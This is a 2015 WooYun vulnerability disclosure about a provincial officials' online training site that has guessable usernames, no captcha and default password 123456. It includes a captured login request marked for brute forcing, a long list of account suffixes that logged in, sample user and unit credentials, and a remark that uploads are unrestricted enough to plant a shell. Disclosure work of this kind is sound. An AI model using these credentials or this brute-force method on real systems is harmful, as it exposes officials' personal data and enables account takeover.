当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157986

漏洞标题:某省干部在线学院设计逻辑缺陷(公务人员信息泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: Bison

提交时间:2015-12-04 11:16

修复时间:2016-01-21 10:21

公开时间:2016-01-21 10:21

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

RT

详细说明:

用户登录名过于简单,可猜测,无验证码,可爆破。海量公务人员信息暴露。
漏洞页面:
http://**.**.**.**/login.aspx

0.png


抓取封包:

POST /login.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/login.aspx
Cookie: ASP.NET_SessionId=fhh2quyesxrpjldc0tfgsdlb; _gscu_1185587572=49123707z5nvfh72; _gscs_1185587572=49123707t0x35p72|pv:3; _gscbrs_1185587572=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTIyNDMwNDg5M2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFImN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkYnRuTG9naW4FJWN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkYnRuUmVnaXN0ZXLPzPYNbO5fqPdKkMaO9DHcN4nTe8scUhfJtEN%2BUQKIpw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&ctl00%24ContentPlaceHolder1%24txtYHM=u004§0000§&ctl00%24ContentPlaceHolder1%24txtMM=123456&ctl00%24ContentPlaceHolder1%24btnLogin.x=33&ctl00%24ContentPlaceHolder1%24btnLogin.y=12


社工了一下,发现用户名为u开头,加7位数字
即:u1234567
随便胡乱输了一个用户名,
密码:123456
后四位为变量,开始爆破:

1.png


3.png


无话可说了。。
上图是成功的,还只是一部分中的一部分。。。
如下:

0016
0035
0046
0058
0063
0081
0082
0083
0108
0110
0141
0143
0144
0145
0152
0177
0191
0200
0211
0213
0219
0234
0244
0245
0250
0252
0253
0254
0255
0257
0259
0276
0288
0294
0295
0296
0313
0327
0347
0349
1099
1105
1117
1134
1138
1139
1142
1149
1157
1158
1162
1164
1176
1177
1201
1239
1256
1273
1274
1275
1276
1277
1279
1281
1285
1288
1312
1316
1329
1330
1338
1341
1343
1365
1368
1373
1378
1379
1388
1390
1393
1397
1403
1414
1416
1443
1444
1445
1453
1455
1456
1500
1501
1519
1522
1529
1556
1557
1560
1562
1564
1569
1588
1619
1634
1641
1642
1674
1676
1680
1687
1689
1690
1692
1693
1708
1709
1711
1724
1727
1740
1742
1743
1754
1759
1766
1777
1782
1786
1788
1792
1806
1817
1818
1820
1821
1822
1861
1869
1875
1878
1936
1944
1945
1966
1972
1991
1995
1999
2003
2004
2008
2010
2011
2012
2013
2018
2019
2022
2023
2028
2033
2034
2037
2038
2073
2084
2098
2106
2108
2109
2113
2119
2135
2152
2161
2167
2169
2214
2222
2228
2246
2252
2272
2305
2315
2317
2321
2329
2337
2341
2343
2345
2347
2355
2357
2362
2371
2376
2385
2389
2391
2396
2459
2461
2463
2467
2469
2472
2479
2486
2487
2496
2515
2518
2523
2546
2561
2562
2565
2581
2583
2590
2591
2593
2598
2600
2618
2620
2628
2634
2639
2640
2647
2654
2655
2656
2658
2659
2661
2669
2670
2690
2691
2693
2694
2698
2704
2705
2707
2709
2712
2732
2738
2739
2742
2743
2744
2745
2746
2747
2767
2770
2773
2782
2789
2802
2803
2806
2808
2809
2810
2811
2816
2821
2823
2827
2828
2833
2836
2851
2859
2860
2866
2867
2870
2874
2892
2915
2938
2959
2980
2982
2990
2996
3000
3036
3038
3042
3045
3046
3049
3052
3053
3055
3056
3059
3061
3063
3066
3073
3075
3077
3086
3089
3143
3149
3153
3157
3160
3173
3179
3180
3181
3182
3186
3239
3262
3269
3273
3275
3283
3318
3321
3326
3329
3335
3337
3339
3341
3358
3360
3362
3401
3411
3435
3439
3443
3446
3449
3465
3470
3478
3483
3492
3496
3501
3503
3506
3511
3523
3524
3535
3537
3542
3547
3561
3564
3567
3572
3580
3597
3619
3660
3662
3664
3666
3668
3670
3681
3724
3725
3729
3730
3731
3734
3738
3742
3754
3787
3794
3798
3839
3853
3857
3876
3878
3883
3899
3910
3923
3926
3927
3929
3931
3937
3943
3946
3948
3949
3954
3955
3963
3986
3990
4028
4116
4123
4124
4125
4127
4129
4130
4138
4179
4187
4189
4190
4191
4192
4202
4203
4208
4229
4230
4231
4233
4235
4236
4237
4242
4243
4244
4252
4255
4258
4259
4262
4264
4268
4269
4276
4277
4281
4283
4288
4294
4295
4296
4303
4305
4308
4309
4315
4321
4347
4374
4380
4383
4394
4396
4421
4438
4444
4447
4460
4466
4471
4473
4498
4501
4503
4504
4505
4512
4516
4521
4538
4546
4547
4595
4600
4607
4610
4638
4646
4649
4666
4667
4668
4680
4683
4717
4719
4733
4744
4758
4764
4768
4769
4770
4774
4775
4777
4781
4791
4792
4817
4829
4830
4831
4840
4850
4855
4869
4881
4883
4887
4888
4889
4891
4892
4894
4911
4922
4923
4929
4952
4956
4957
4958
4965
4968
4975
4977
4988
5035
5042
5082
5084
5085
5086
5094
5096
5098
5100
5101
5102
5104
5111
5123
5125
5139
5146
5150
5160
5187
5190
5204
5207
5208
5210
5219
5224
5227
5246
5258
5273
5293
5295
5296
5312
5322
5323
5337
5340
5350
5367
5382
5390
5426
5446
5452
5468
5473
5474
5483
5499
5500
5507
5514
5521
5546
5548
5556
5557
5558
5586
5613
5616
5617
5633
5650
5652
5655
5673
5681
5688
5690
5700
5701
5705
5706
5709
5710
5713
5714
5727
5728
5732
5746
5761
5762
5763
5767
5777
5778
5781
5793
5795
5801
5802
5803
5804
5823
5828
5830
5843
5846
5853
5861
5867
5870
5875
5877
5888
5899
5907
5942
5945
5946
5957
5959
5962
5964
5965
5968
5970
5986
5991
5999
6000
6013
6017
6019
6021
6023
6027
6034
6035
6036
6039
6044
6048
6050
6055
6067
6068
6075
6084
6085
6086
6088
6094
6102
6111
6117
6121
6125
6136
6137
6144
6150
6151
6152
6153
6343
6344
6345
6353
6354
6356
6358
6385
6386
6418
6423
6424
6436
6437
6440
6441
6454
6459
6480
6482
6487
6499
6527
6528
6529
6535
6538
6540
6543
6552
6556
6557
6562
6567
6577
6586
6587
6591
6592
6596
6601
6607
6615
6635
6640
6644
6655
6657
6670
6697
6699
6723
6759
6763
6779
6791
6793
6795
6829
6832
6833
6841
6843
6847
6849
6854
6855
6856
6876
6888
6894
6895
6898
6899
6901
6907
6913
6914
6926
6930
6935
6951
6959
6961
6996
7055
7080
7094
7108
7127
7150
7170
7172
7173
7190
7191
7198
7211
7258
7272
7276
7278
7310
7339
7350
7359
7381
7386
7435
7452
7455
7456
7459
7497
7507
7534
7539
7543
7546
7559
7577
7581
7588
7592
7593
7604
7612
7634
7677
7686
7687
7689
7692
7716
7732
7740
7772
7782
7796
7806
7821
7831
7842
7852
7862
7878
7881
7889
7891
7937
7972
8005
8011
8012
8035
8036
8049
8053
8067
8084
8092
8094
8104
8116
8122
8126
8130
8142
8144
8146
8178
8179
8181
8197
8229
8232
8253
8258
8263
8266
8268
8270
8273
8292
8306
8311
8325
8326
8327
8328
8329
8331
8332
8336
8337
8340
8347
8348
8355
8358
8361
8387
8405
8411
8413
8414
8415
8416
8417
8423
8426
8463
8478
8483
8501
8527
8528
8537
8538
8569
8586
8587
8597
8623
8624
8641
8645
8654
8663
8666
8687
8689
8696
8697
8699
8721
8778
8783
8791
8797
8799
8802
8822
8826
8837
8853
8857
8858
8860
8864
8865
8867
8869
8871
8884
8887
8893
8908
8911
8914
8917
8927
8939
8960
8965
8968
8970
8974
8982
8989
8996
8998
8999
9009
9011
9014
9018
9029
9045
9056
9062
9068
9076
9087
9089
9098
9105
9107
9116
9121
9133
9134
9139
9147
9158
9163
9166
9169
9175
9181
9194
9197
9202
9212
9214
9217
9219
9220
9239
9246
9279
9298
9307
9308
9316
9320
9325
9327
9328
9376
9377
9387
9392
9393
9395
9396
9401
9402
9423
9453
9459
9464
9472
9477
9478
9479
9493
9494
9497
9499
9501
9504
9505
9508
9509
9514
9521
9522
9523
9525
9526
9532
9533
9537
9546
9562
9594
9620
9622
9634
9638
9651
9681
9696
9701
9702
9704
9706
9738
9754
9755
9760
9761
9763
9775
9776
9782
9787
9794
9797
9800
9801
9803
9807
9809
9820
9840
9843
9844
9861
9862
9881
9885
9896
9907
9908
9933
9946
9954
9955
9966
9973
9978
9981
9985
9986
9992
9998


在以上的4位数字前加 u004
即:
u0049998
u0040016
登录进去,如下:
用户名
u0049998
密码:
123456

4.png


如上图,出现学院所在单位,姓名。
之后,单击选学报名:

5.png


单击单位用户登陆

http://**.**.**.**/yxdanweilogin.aspx


6.png


随便复制一个左边的单位编号,
在右侧输入,
密码输 123456
我选了一个级别大的:
14000055
123456

7.png


8.png


可修改密码:

10.png


11.png


这个。。。
140000550154 省委“610”办公室
咳咳。好多没见过的东西啊。。。不上图了。。。
对传输格式没有限制!可传shell

9.png


我没传啊,没敢传。。。

漏洞证明:

7.png


8.png


可修改密码:

10.png


11.png


最后我想说一句,能多给点rank么?

修复方案:

加强校验。

版权声明:转载请注明来源 Bison@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-12-08 11:06

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置.

最新状态:

暂无